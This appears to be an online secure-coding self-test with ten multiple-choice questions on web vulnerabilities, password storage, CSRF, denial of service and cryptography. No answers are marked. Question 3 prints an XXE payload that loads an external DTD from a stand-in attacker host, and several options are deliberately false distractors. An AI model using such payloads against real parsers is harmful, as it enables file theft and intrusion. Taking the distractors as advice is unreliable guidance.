Test yourself!
Name:
E-mail:
I agree with the
privacy policy!
1.
Which of the URLs below are likely to be manipulated by an attacker to access a resource they shouldn't be able to access (Insecure Direct Object Reference)?
https://www.example.com/articles/220101-happy-new-year-from-examplecom
https://www.example.com/help?helpfile=docviewer.txt&language=en
https://www.example.com/documents/390c1890-2bd3-4f3a-878f-ed896a2979c7
https://www.example.com/users/134/messages
https://www.example.com/invoices/19374
2.
What do programmers need to do to avoid injection vulnerabilities in databases?
Choose one
Correct
Partially
Wrong
Nothing in particular, SQL injection is a solved problem in 2022.
Use an ORM such as Hibernate, Entity Framework or SQLAlchemy.
Use static stored procedures or server-side parameterized / prepared statements.
Escape control characters such as single and double quotes.
Use noSQL databases such as MongoDB, Cosmos DB or DynamoDB, since they are immune to SQL injection.
3.
Take this XML:
<?xml version="1.0" ?>
<!DOCTYPE evil [
<!ENTITY % dtd SYSTEM "https://evil.hacker.com/evil.dtd">
%dtd;
%dosomething;
]>
<a>&x;</a>
Assuming that the attacker is in control of https://evil.hacker.com/evil.dtd, which of the following can the attacker realistically force our program to do when we parse this XML file?
Consume extreme amounts of memory.
Read an arbitrary file from the file system.
Infect other XML files on our machine to make them malicious as well.
Access an intranet server's functionality.
Deploy malware to the server.
4.
Let's say users on your website can upload a .jpg file into a file storage area. How would you protect your system from malicious uploaded files?
Choose one
Correct
Partially
Wrong
Store uploaded files in a directory outside the web application's webroot.
Only accept the file if its extension ends with .jpg.
Validate the Content-Type header and only allow the upload if it is "image/jpeg".
Attempt to open the file via the JPEG parser library, and verify that it opens correctly.
Set the filename yourself instead of relying on the one given by the user.
5.
What would you do if you had to upgrade your user password storage to use a more secure storage algorithm (e.g. switching from MD5 to Argon2)?
Choose one
Correct
Partially
Wrong
"Password recovery": reverse all user password hashes to recover them, then use the plaintext passwords as input to Argon2 and update all stored passwords in the database.
"Forced upgrade": Zero out all password hashes and send all users an email to force them to recover their account (e.g. by using one-time codes sent out to them at time of registration) and set a new password. Once a user has gone through the password recovery process, use their new password as input to Argon2 and store the result in the database.
"Soft upgrade": When a user logs in, once they've managed to successfully authenticate, use the password they entered as input to Argon2 and store it in the database, replacing their old password hash.
See "Forced upgrade", but also keep a copy of the old password database around to make sure users don't pick the same password they had before.
See "Soft upgrade", but also rehash all old MD5 password hashes with Argon2 immediately, and verify this double hash on login (Argon2(MD5(password))) until a user has successfully logged in and had their password upgraded.
6.
Which of the following will have a positive effect on the strength of user passwords?
Choose one
Correct
Partially
Wrong
Only printable ASCII characters should be used in a password (verified via an allowlist).
Passwords should be at least 14 characters long.
A denylist should be used to reject dictionary words and patterns like "qwertyuiop".
Copy and paste functionality should be disallowed on the login screen.
Users should change (rotate) their passwords regularly.
7.
Which of the following solutions can help developers avoid Cross-Site Request Forgery (CSRF) attacks?
Choose one
Correct
Partially
Wrong
Generate a random token value for each session, store it in a cookie, and append it to all URLs in the generated HTML. Then verify that both the URL parameter and the cookie are present and have the same value when processing each request.
There is no need to deal with CSRF anymore, since modern Web frameworks have built-in protection against it.
Set "SameSite=Lax" or "SameSite=Strict" as a cookie attribute.
Verify the "Origin" and "Referer" (sic!) headers on each request.
Generate a random token value for each session (or each request), store it as a session variable, and put it into all generated HTML pages so it's sent back to the server with each request. Then verify that the token is present and matches the session value when processing each request.
8.
You're using MegaBrainSoft's JSON library to parse JSONs sent by the client. Someone posted a tweet about a zero-day vulnerability in it:
A potential remote code execution (RCE) if a JSON schema is used to validate a malformed JSON file. The vulnerability is called "BrainF0g" (CVE-2022-xxxxx) and has a CVSS score of 9.8 on NVD. MegaBrainSoft says a patch will be released in 7 days. Which of the following steps are productive in this situation?
Choose one
Correct
Partially
Wrong
Wait until MegaBrainSoft publishes the patch, then update to the new version.
Disable JSON schema validation functionality in the code.
Calculate BrainF0g's temporal and environmental CVSS scores, with all the other steps this implies (e.g. trying out the proof-of-concept exploit code in a test environment).
Immediately switch out the JSON parser for another vendor's product.
Rewrite the validation function so that the JSON schema validator is only called if the JSON is well-formed in the first place.
9.
Which of the following are viable denial of service attacks against a modern web application behind a state-of-the-art load balancer?
Choose one
Correct
Partially
Wrong
SYN flood and ping of death.
Regular Expression Denial of Service (ReDoS).
A Distributed Denial of Service (DDoS) attack where each node makes HEAD requests to the server.
Uploading an XML bomb or decompression bomb via the appropriate interface.
Slow attacks such as Slowloris and RUDY.
10.
Which of the following statements are true?
Choose one
Correct
Partially
Wrong
Older encryption algorithms (like AES) should be deprecated in favor of elliptic curve cryptography due to advances in quantum computing.
If using a block cipher, the ECB mode of operation should never be used.
The initialization vector should be hard-coded to ensure consistency when encrypting data.
A strong random number generator (TRNG or CSPRNG) is a prerequisite for using cryptographic algorithms.
Message Authentication Codes and digital signatures are both used to protect data integrity, authenticity, and non-repudiation.
I agree with the
privacy policy!